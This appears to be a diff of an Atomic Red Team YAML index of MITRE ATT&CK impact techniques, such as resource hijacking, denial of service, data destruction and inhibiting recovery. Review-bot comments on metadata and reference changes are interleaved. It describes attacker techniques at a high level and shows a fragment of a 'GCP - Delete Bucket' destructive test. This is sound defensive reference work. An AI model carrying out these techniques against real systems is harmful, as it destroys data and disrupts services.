+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Network Traffic: Network Connection Creation'
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ - 'Sensor Health: Host Status'
+ - 'Process: Process Creation'
+ - 'File: File Creation'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--a718a0c8-5768-41a1-9958-a1cc3f995e99
+ created: '2024-09-25T13:34:30.100Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/001
+ external_id: T1496.001
+ - source_name: Unit 42 Hildegard Malware
+ description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
+ Malware Targeting Kubernetes. Retrieved April 5, 2021.'
+ url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
+ - source_name: CloudSploit - Unused AWS Regions
+ description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
+ Retrieved October 8, 2019.
+ url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
+ - source_name: Kaspersky Lazarus Under The Hood Blog 2017
+ description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
+ 17, 2019.
+ url: https://securelist.com/lazarus-under-the-hood/77908/
+ - source_name: Trend Micro Exposed Docker APIs
+ description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
+ via Exposed APIs. Retrieved April 6, 2021.
+ url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
+ - source_name: Trend Micro War of Crypto Miners
+ description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
+ Miners: A Battle for Resources. Retrieved April 6, 2021.'
+ url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1565:
technique:
modified: '2024-02-02T17:18:39.004Z'
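Review bot: no T1496.003 appears in this hunk, which adds only T1496.004 (Cloud Service Hijacking) and T1496.001 (Compute Hijacking), even though the rewritten T1496 parent description further down lists four forms of resource hijacking and T1496.002 was added in an earlier hunk; confirm the remaining sub-technique is added elsewhere in the file. The T1496.001 description is the cryptomining text that the parent's old description loses below, and its `external_references` (Hildegard, CloudSploit, Kaspersky, the two Trend Micro posts) are exactly the entries being removed from the parent, so that part of the split is consistent.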
@@ -58073,11 +59052,10 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1531:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:35:13.577Z'
name: Account Access Removal
description: "Adversaries may interrupt availability of system and network resources
by inhibiting access to accounts utilized by legitimate users. Accounts may
@@ -58100,6 +59078,7 @@ impact:
phase_name: impact
x_mitre_contributors:
- Hubert Mank
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -58117,9 +59096,10 @@ impact:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- x_mitre_version: '1.2'
+ - IaaS
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'User Account: User Account Modification'
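Review bot: T1531 gains `IaaS` and `Office Suite` and drops `Office 365` in the same platform consolidation applied to T1657 above, with a minor bump from 1.2 to 1.3; as with T1657, per-platform indexes keyed on the old platform name need regenerating in this change.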
@@ -58145,9 +59125,8 @@ impact:
url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1531
atomic_tests: []
T1486:
@@ -58234,7 +59213,7 @@ impact:
NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within
compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware
Part 1)"
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-06-16T13:07:10.318Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Data Encrypted for Impact
x_mitre_detection: |-
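Review bot: T1486's `modified` also moves backwards, from 2022-11-08 to 2022-06-16, and the following hunk still shows `x_mitre_attack_spec_version: 2.1.0` for it; same concern as for T1491 and T1491.001, this object looks like it came from an older copy of the data.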
@@ -58258,12 +59237,11 @@ impact:
- Availability
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1486
atomic_tests: []
T1499:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:56:47.424Z'
name: Endpoint Denial of Service
description: |
Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -58282,7 +59260,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Alfredo Oliveira, Trend Micro
- David Fiser, @anu4is, Trend Micro
@@ -58299,18 +59276,13 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- x_mitre_version: '1.1'
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Flow'
@@ -58334,8 +59306,8 @@ impact:
- source_name: FSISAC FraudNetDoS September 2012
description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
- Fraud. Retrieved April 18, 2019.
- url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+ Fraud. Retrieved September 23, 2024.
+ url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
- source_name: ArsTechnica Great Firewall of China
description: Goodin, D.. (2015, March 31). Massive denial-of-service attack
on GitHub tied to Chinese government. Retrieved April 19, 2019.
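Review bot: the FSISAC reference's `url` changes to the `/Media/PDF/Y2012/` path on ic3.gov and the retrieval date is updated to September 23, 2024 to match, which is the right way to record a relocated source; the only ask is a quick check that the new path actually serves the PDF.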
@@ -58355,33 +59327,22 @@ impact:
url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1496:
technique:
- modified: '2024-02-14T21:00:00.467Z'
+ modified: '2024-10-13T17:00:09.759Z'
name: Resource Hijacking
description: "Adversaries may leverage the resources of co-opted systems to
complete resource-intensive tasks, which may impact system and/or hosted service
- availability. \n\nOne common purpose for Resource Hijacking is to validate
- transactions of cryptocurrency networks and earn virtual currency. Adversaries
- may consume enough system resources to negatively impact and/or cause affected
- machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood
- Blog 2017) Servers and cloud-based systems are common targets because of the
- high potential for available resources, but user endpoint systems may also
- be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation:
- CloudSploit - Unused AWS Regions) Containerized environments may also be targeted
- due to the ease of deployment via exposed APIs and the potential for scaling
- mining activities by deploying or compromising multiple containers within
- an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation:
- Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining
- malware identify then kill off processes for competing malware to ensure it’s
- not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries
- may also use malware that leverages a system's network bandwidth as part of
- a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)
- campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,
- they may engage in proxyjacking by selling use of the victims' network bandwidth
- and IP address to proxyware services.(Citation: Sysdig Proxyjacking)"
+ availability. \n\nResource hijacking may take a number of different forms.
+ For example, adversaries may:\n\n* Leverage compute resources in order to
+ mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate
+ SMS traffic for profit\n* Abuse cloud-based messaging services to send large
+ quantities of spam messages\n\nIn some cases, adversaries may leverage multiple
+ types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking
+ 2023)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
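Review bot: the rewritten T1496 description cites `(Citation: Sysdig Cryptojacking Proxyjacking 2023)`, but no `external_references` entry with that `source_name` is visible anywhere in this diff; if it is not added further down in the T1496 block the citation will render as a dangling reference. The bullet list is embedded in a double-quoted scalar with literal `\n\n* ` sequences, which YAML unescapes correctly, so the rendered text itself is fine.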
@@ -58392,7 +59353,7 @@ impact:
- Magno Logan, @magnologan, Trend Micro
- Vishwas Manral, McAfee
- Yossi Weizman, Azure Defender Research Team
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: Consider monitoring process resource usage to determine anomalous
activity associated with malicious hijacking of computer resources such as
@@ -58409,8 +59370,11 @@ impact:
- Linux
- macOS
- Containers
- x_mitre_version: '1.5'
+ - SaaS
+ x_mitre_version: '2.0'
x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ - 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- 'File: File Creation'
@@ -58429,99 +59393,73 @@ impact:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1496
external_id: T1496
- - source_name: Unit 42 Hildegard Malware
- description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
- Malware Targeting Kubernetes. Retrieved April 5, 2021.'
- url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
- - source_name: CloudSploit - Unused AWS Regions
- description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
- Retrieved October 8, 2019.
- url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
- - source_name: Sysdig Proxyjacking
- description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
- Chat. Retrieved July 6, 2023.
- url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
- - source_name: Kaspersky Lazarus Under The Hood Blog 2017
- description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
- 17, 2019.
- url: https://securelist.com/lazarus-under-the-hood/77908/
- - source_name: Trend Micro Exposed Docker APIs
- description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
- via Exposed APIs. Retrieved April 6, 2021.
- url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
- - source_name: Trend Micro War of Crypto Miners
- description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
- Miners: A Battle for Resources. Retrieved April 6, 2021.'
- url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
- - source_name: GoBotKR
- description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
- Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
- url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+ - source_name: Sysdig Cryptojacking Proxyjacking 2023
+ description: 'Miguel Hernandez. (2023, August 17). LABRAT: Stealthy Cryptojacking
+ and Proxyjacking Campaign Targeting GitLab . Retrieved September 25, 2024.'
+ url: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1496
atomic_tests: []
T1565.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
- created: '2020-03-02T14:27:00.693Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1565.002
- url: https://attack.mitre.org/techniques/T1565/002
- - source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
- description: Department of Justice. (2018, September 6). Criminal Complaint
- - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- - source_name: FireEye APT38 Oct 2018
- url: https://content.fireeye.com/apt/rpt-apt38
- description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
- November 6, 2018.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-08-26T16:33:33.983Z'
+ name: Transmitted Data Manipulation
description: |-
Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Transmitted Data Manipulation
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
can be difficult without the appropriate tools. In some cases integrity verification
checks, such as file hashing, may be used on critical files as they transit
a network. With some critical processes involving transmission of data, manual
or out-of-band integrity checking may be useful for identifying manipulated
data. '
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
x_mitre_impact_type:
- Integrity
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
+ created: '2020-03-02T14:27:00.693Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1565/002
+ external_id: T1565.002
+ - source_name: DOJ Lazarus Sony 2018
+ description: Department of Justice. (2018, September 6). Criminal Complaint
+ - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
+ - source_name: FireEye APT38 Oct 2018
+ description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+ November 6, 2018.'
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1485:
technique:
- modified: '2023-10-03T17:30:32.192Z'
+ modified: '2024-09-25T20:46:14.641Z'
name: Data Destruction
description: |-
Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del
and rm
often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
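Review bot: `spec_version: '2.1'` is deleted from T1496 and T1565.002 here with nothing replacing it, and the same deletion repeats for every technique in the rest of this patch; confirm that dropping the STIX spec_version is a deliberate generator change rather than a lost field, since downstream tooling that validates these objects as STIX 2.1 may depend on it. The remainder of this hunk is mostly key reordering (modified/name hoisted to the top, platforms/type/id/external_references pushed to the bottom), which buries the small content changes (the FireEye APT38 URL moving to the mandiant.com PDF, x_mitre_attack_spec_version 2.1.0 to 3.2.0); emitting keys in a fixed order from the generator would keep future diffs reviewable.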
@@ -58530,7 +59468,7 @@ impact:
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
- In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
+ In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -58556,9 +59494,10 @@ impact:
- Linux
- macOS
- Containers
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Snapshot: Snapshot Deletion'
+ - 'Cloud Storage: Cloud Storage Modification'
- 'Process: Process Creation'
- 'File: File Deletion'
- 'Image: Image Deletion'
@@ -58614,7 +59553,6 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1485
atomic_tests:
- name: GCP - Delete Bucket
@@ -58688,50 +59626,7 @@ impact:
terraform apply -auto-approve
T1498:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
- - Containers
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Yossi Weizman, Azure Defender Research Team
- - Vishwas Manral, McAfee
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
- type: attack-pattern
- created: '2019-04-17T20:23:15.105Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1498
- url: https://attack.mitre.org/techniques/T1498
- - source_name: FireEye OpPoisonedHandover February 2016
- url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
- description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
- 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
- Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
- - source_name: FSISAC FraudNetDoS September 2012
- url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
- description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
- Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
- Fraud. Retrieved April 18, 2019.
- - source_name: Symantec DDoS October 2014
- url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
- description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
- Retrieved April 24, 2019.
- - source_name: Cisco DoSdetectNetflow
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T16:01:00.510Z'
name: Network Denial of Service
description: |-
Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -58746,6 +59641,10 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_contributors:
+ - Yossi Weizman, Azure Defender Research Team
+ - Vishwas Manral, McAfee
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
service, but such response time typically requires very aggressive monitoring
@@ -58758,16 +59657,52 @@ impact:
may be small and the indicator of an event availability of the network or
service drops. The analysis tools mentioned can then be used to determine
the type of DoS causing the outage and help with remediation.'
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ - Containers
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Sensor Health: Host Status'
x_mitre_impact_type:
- Availability
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
+ created: '2019-04-17T20:23:15.105Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1498
+ external_id: T1498
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+ - source_name: FSISAC FraudNetDoS September 2012
+ description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
+ Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
+ Fraud. Retrieved September 23, 2024.
+ url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+ - source_name: FireEye OpPoisonedHandover February 2016
+ description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
+ 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
+ Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
+ url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
+ - source_name: Symantec DDoS October 2014
+ description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
+ Retrieved April 24, 2019.
+ url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1495:
technique:
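Review bot: the T1498 platform list shrinks from nine entries (Windows, Azure AD, Office 365, SaaS, IaaS, Linux, macOS, Google Workspace, Containers) to five (Windows, IaaS, Linux, macOS, Containers); check this against upstream before merging, since it silently drops SaaS in addition to the Azure AD / Office 365 / Google Workspace entries that are replaced by Identity Provider and Office Suite elsewhere in this patch. The FS-ISAC reference URL moving to ic3.gov/Media/PDF/Y2012/ with a September 23, 2024 retrieved date is fine. No index CSV rows are affected because atomic_tests stays empty.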
@@ -58835,11 +59770,10 @@ impact:
- Availability
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1490:
technique:
- modified: '2024-04-12T02:30:08.379Z'
+ modified: '2024-09-24T13:27:31.881Z'
name: Inhibit System Recovery
description: |-
Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
@@ -58857,7 +59791,7 @@ impact:
On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
- Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
+ Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -58884,7 +59818,7 @@ impact:
- Network
- IaaS
- Containers
- x_mitre_version: '1.4'
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Modification'
@@ -58934,13 +59868,12 @@ impact:
url: https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/
- source_name: disable_notif_synology_ransom
description: TheDFIRReport. (2022, March 1). Disabling notifications on Synology
- servers before ransom. Retrieved October 19, 2022.
- url: https://twitter.com/TheDFIRReport/status/1498657590259109894
+ servers before ransom. Retrieved September 12, 2024.
+ url: https://x.com/TheDFIRReport/status/1498657590259109894
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1490
atomic_tests: []
T1561.001:
@@ -59008,11 +59941,10 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1529:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T20:45:22.531Z'
name: System Shutdown/Reboot
description: |-
Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload
).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
